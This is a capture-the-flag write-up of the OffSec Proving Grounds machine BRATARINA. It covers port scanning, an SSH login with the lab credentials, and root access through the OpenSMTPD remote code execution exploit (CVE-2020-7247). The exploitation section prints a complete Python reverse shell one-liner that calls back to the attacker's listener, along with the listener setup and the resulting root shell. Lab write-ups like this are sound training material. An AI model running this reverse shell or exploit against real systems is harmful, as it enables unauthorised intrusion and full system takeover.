Skip to main content
  1. Posts/

OFFSEC - Proving Grounds - BRATARINA

·1349 words·7 mins·
OFFSEC PG PRACTICE OPENSTMPD
Author
Table of Contents

Summary
#

Using the provided OFFSEC credentials initial access is possible through SSH. Another path is exploiting the OpenSTMPD service running on port 25, which is vulnerable to a remote code execution exploit which gives access to the root user.

Specifications
#

  • Name: BRATARINA
  • Platform: PG PRACTICE
  • Points: 10
  • Difficulty: Easy
  • System overview: Linux bratarina 4.15.0-109-generic #110-Ubuntu SMP Tue Jun 23 02:39:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
  • IP address: 192.168.159.71
  • OFFSEC provided credentials: neil:TalonTribunalFrown090
  • HASH: local.txt: None
  • HASH: proof.txt:d1a3e21c27ac4c1a7a7ebbd6ced4f708

Preparation
#

First we’ll create a directory structure for our files, set the IP address to a bash variable and ping the target:

## create directory structure
mkdir bratarina && cd bratarina && mkdir enum files exploits uploads tools

## list directory
ls -la

total 28
drwxrwxr-x  7 kali kali 4096 Jul 21 15:50 .
drwxrwxr-x 12 kali kali 4096 Jul 21 15:50 ..
drwxrwxr-x  2 kali kali 4096 Jul 21 15:50 enum
drwxrwxr-x  2 kali kali 4096 Jul 21 15:50 exploits
drwxrwxr-x  2 kali kali 4096 Jul 21 15:50 files
drwxrwxr-x  2 kali kali 4096 Jul 21 15:50 tools
drwxrwxr-x  2 kali kali 4096 Jul 21 15:50 uploads

## set bash variable
ip=192.168.159.71

## ping target to check if it's online
ping $ip

PING 192.168.159.71 (192.168.159.71) 56(84) bytes of data.
64 bytes from 192.168.159.71: icmp_seq=1 ttl=61 time=23.9 ms
64 bytes from 192.168.159.71: icmp_seq=2 ttl=61 time=25.5 ms
^C
--- 192.168.159.71 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 23.894/24.681/25.469/0.787 ms

Reconnaissance
#

Portscanning
#

Using Rustscan we can see what TCP ports are open. This tool is part of my default portscan flow.

## run the rustscan tool
sudo rustscan -a $ip | tee enum/rustscan

.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
0day was here ♥

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.159.71:22
Open 192.168.159.71:25
Open 192.168.159.71:80
Open 192.168.159.71:445
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-21 15:54 CEST
Initiating Ping Scan at 15:54
Scanning 192.168.159.71 [4 ports]
Completed Ping Scan at 15:54, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:54
Completed Parallel DNS resolution of 1 host. at 15:54, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:54
Scanning 192.168.159.71 [4 ports]
Discovered open port 445/tcp on 192.168.159.71
Discovered open port 25/tcp on 192.168.159.71
Discovered open port 22/tcp on 192.168.159.71
Discovered open port 80/tcp on 192.168.159.71
Completed SYN Stealth Scan at 15:54, 0.04s elapsed (4 total ports)
Nmap scan report for 192.168.159.71
Host is up, received echo-reply ttl 61 (0.021s latency).
Scanned at 2025-07-21 15:54:41 CEST for 0s

PORT    STATE SERVICE      REASON
22/tcp  open  ssh          syn-ack ttl 61
25/tcp  open  smtp         syn-ack ttl 61
80/tcp  open  http         syn-ack ttl 61
445/tcp open  microsoft-ds syn-ack ttl 61

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
           Raw packets sent: 8 (328B) | Rcvd: 5 (204B)

Copy the output of open ports into a file called ports within the files directory.

## edit the ``files/ports` file
nano files/ports

## content `ports` file:
22/tcp  open  ssh          syn-ack ttl 61
25/tcp  open  smtp         syn-ack ttl 61
80/tcp  open  http         syn-ack ttl 61
445/tcp open  microsoft-ds syn-ack ttl 61

Run the following command to get a string of all open ports and use the output of this command to paste within NMAP:

## change directory
cd files  

## get a list, comma separated of the open port(s)
cat ports | cut -d '/' -f1 > ports.txt && awk '{printf "%s,",$0;n++}' ports.txt | sed 's/.$//' > ports && rm ports.txt && cat ports

## output previous command
22,25,80,445 

## move one up
cd ..

## use this output in the `nmap` command below:
sudo nmap -T3 -p 22,25,80,445 -sCV -vv $ip -oN enum/nmap-services-tcp

Output of NMAP:

22/tcp  open  ssh         syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:dd:2c:ea:2f:85:c5:89:bc:fc:e9:a3:38:f0:d7:50 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJ0GZmmFtQUJbj2HgPsye2Xccyyh9mC8fsCwIivM4x3o3mwZDNi6g+Y6nIs5SuOJj2IpS+E9O5wB71MSIv7d7XYrd6paprfvnvMCyAQ9VTn8py6CQ/OsgeOITU+JnAxoe3WQklpyAVqhJ7ASqAInZF8oHDaebr6gBKEq4nkoLOtJSZeB8xWDHhbQZjG6AY81Y2mHPZH/LC4gSXpSmw+3h0zhlCN/kxeyhjrsrZqIVdKhg4emds8+gQyu1Wrz4AUUBGscI6Sh5rjImr+SC4rAGgn6N0MVPcZA1mS0JUplz758Y3YFXstqO2SdaHB/Qb50fkcpclcYKibSbCv5ZLNzOf
|   256 e3:b7:65:c2:a7:8e:45:29:bb:62:ec:30:1a:eb:ed:6d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOWgZAzhJ+plc4Rk/YyGvQ1KOKK9j31ix1uCWIAirjnZS/lKwcvYrkG+lVsJRBnBYVA+67ILSJR2YNVz9uZshPE=
|   256 d5:5b:79:5b:ce:48:d8:57:46:db:59:4f:cd:45:5d:ef (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC2Z9krPXlbEN6Xl40sc3BiVLfhbtd+l5ZFNBKkF7pYT
25/tcp  open  smtp        syn-ack ttl 61 OpenSMTPD
| smtp-commands: bratarina Hello nmap.scanme.org [192.168.45.195], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info
80/tcp  open  http        syn-ack ttl 61 nginx 1.14.0 (Ubuntu)
|_http-title:         Page not found - FlaskBB        
|_http-server-header: nginx/1.14.0 (Ubuntu)
445/tcp open  netbios-ssn syn-ack ttl 61 Samba smbd 4.7.6-Ubuntu (workgroup: COFFEECORP)
Service Info: Host: bratarina; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: bratarina
|   NetBIOS computer name: BRATARINA\x00
|   Domain name: \x00
|   FQDN: bratarina
|_  System time: 2025-07-21T09:56:16-04:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 1h20m01s, deviation: 2h18m36s, median: 0s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 17784/tcp): CLEAN (Timeout)
|   Check 2 (port 15623/tcp): CLEAN (Timeout)
|   Check 3 (port 33461/udp): CLEAN (Timeout)
|   Check 4 (port 34791/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2025-07-21T13:56:13
|_  start_date: N/A

Initial Access
#

Initial Access: path 1
# 

22/tcp  open  ssh         syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:dd:2c:ea:2f:85:c5:89:bc:fc:e9:a3:38:f0:d7:50 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJ0GZmmFtQUJbj2HgPsye2Xccyyh9mC8fsCwIivM4x3o3mwZDNi6g+Y6nIs5SuOJj2IpS+E9O5wB71MSIv7d7XYrd6paprfvnvMCyAQ9VTn8py6CQ/OsgeOITU+JnAxoe3WQklpyAVqhJ7ASqAInZF8oHDaebr6gBKEq4nkoLOtJSZeB8xWDHhbQZjG6AY81Y2mHPZH/LC4gSXpSmw+3h0zhlCN/kxeyhjrsrZqIVdKhg4emds8+gQyu1Wrz4AUUBGscI6Sh5rjImr+SC4rAGgn6N0MVPcZA1mS0JUplz758Y3YFXstqO2SdaHB/Qb50fkcpclcYKibSbCv5ZLNzOf
|   256 e3:b7:65:c2:a7:8e:45:29:bb:62:ec:30:1a:eb:ed:6d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOWgZAzhJ+plc4Rk/YyGvQ1KOKK9j31ix1uCWIAirjnZS/lKwcvYrkG+lVsJRBnBYVA+67ILSJR2YNVz9uZshPE=
|   256 d5:5b:79:5b:ce:48:d8:57:46:db:59:4f:cd:45:5d:ef (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC2Z9krPXlbEN6Xl40sc3BiVLfhbtd+l5ZFNBKkF7pYT

Because we got credentials from OFFSEC we first try to login using SSH on TCP port 22.

## login to target using SSH and provided credentials
ssh neil@$ip

neil@bratarina:~$

Indeed, we can login for initial access over SSH.

Initial Access: path 2
# 

25/tcp  open  smtp        syn-ack ttl 61 OpenSMTPD
| smtp-commands: bratarina Hello nmap.scanme.org [192.168.45.195], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES,

On port 25 there is an OpenSMTPD service running. Using searchsploit we can try to find an available exploit. We can try to get remote code execution using linux/remote/47984.py.

## change directory
cd exploits              

## use searchsploit to find exploit
searchsploit opensmtpd               
---------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                    |  Path
---------------------------------------------------------------------------------- ---------------------------------
OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)                          | linux/remote/48038.rb
OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)                      | linux/local/48185.rb
OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution      | openbsd/remote/48051.pl
OpenSMTPD 6.6.1 - Remote Code Execution                                           | linux/remote/47984.py
OpenSMTPD 6.6.3 - Arbitrary File Read                                             | linux/remote/48139.c
OpenSMTPD < 6.6.3p1 - Local Privilege Escalation + Remote Code Execution          | openbsd/remote/48140.c
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results


																												
searchsploit -m linux/remote/47984.py

  Exploit: OpenSMTPD 6.6.1 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/47984
     Path: /usr/share/exploitdb/exploits/linux/remote/47984.py
    Codes: CVE-2020-7247
 Verified: True
File Type: Python script, ASCII text executable

Once downloaded we can run the exploit and get root on the box. The command we send is a python reverse shell, so first we need to setup a listener.

## setup listener
nc -lvnp 80

## run the exploit
python3 47984.py 192.168.159.71 25 'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.45.195\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done

## catch reverse shell
nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.195] from (UNKNOWN) [192.168.159.71] 44560

## run the `whoami` command
root@bratarina:~# whoami
root

## print `proof.txt`
root@bratarina:~# cat /root/proof.txt
cat /root/proof.txt
d1a3e21c27ac4c1a7a7ebbd6ced4f708

References
#

[+] https://www.exploit-db.com/exploits/47984

Related

OFFSEC - Proving Grounds - NUKEM
·2010 words·10 mins
OFFSEC PG PRACTICE WORDPRESS DOSBOX
Access target via SSH or exploit WordPress with wpscan using simple-file-list vuln. Get http user, find commander creds in wp-config.php, use SUID dosbox for root.
OFFSEC - Proving Grounds - PC
·1370 words·7 mins
OSCP OFFSEC PG PRACTICE RPC
SSH or browser terminal on port 8000 for initial access. Escalate privileges via RPC server running as root using Python exploit script (CVE-2022-35411) to gain root access.
OFFSEC - Proving Grounds - EXFILTRATED
·2598 words·13 mins
OSCP OFFSEC PG PRACTICE SUBRION CMS PWNKIT EXIFTOOL
SSH or Subrion CMS 4.2.1 file upload for access. Run linpeas to find CVE-2021-4034 (PwnKit) & cronjob with exiftool (CVE-2021-22204) for root.
OFFSEC - Proving Grounds - ZINO
·2524 words·12 mins
OFFSEC PG PRACTICE NXC SMB SMBCLIENT
Access server with SMB file and use a Python exploit for PHP webshell in Booked Scheduler. Escalate to root via cronjob.
OFFSEC - Proving Grounds - APEX
·2792 words·14 mins
OFFSEC PG PRACTICE OPENEMR MYSQL FILEMANAGER GOBUSTER
Exploit filemanager vuln on port 80 for OpenEMR SQL creds. Login to MySQL, get admin hash for app access. Use app exploit for initial access, reuse password for root escalation.
OFFSEC - Proving Grounds - LEVRAM
·1982 words·10 mins
OSCP OFFSEC PG PRACTICE GERAPY
Port 8000 redirects to GERAPY v0.9.7 login. Use default credentials for access. Auth RCE grants initial access. /usr/bin/python3.10 with cap_setuid=ep gives root.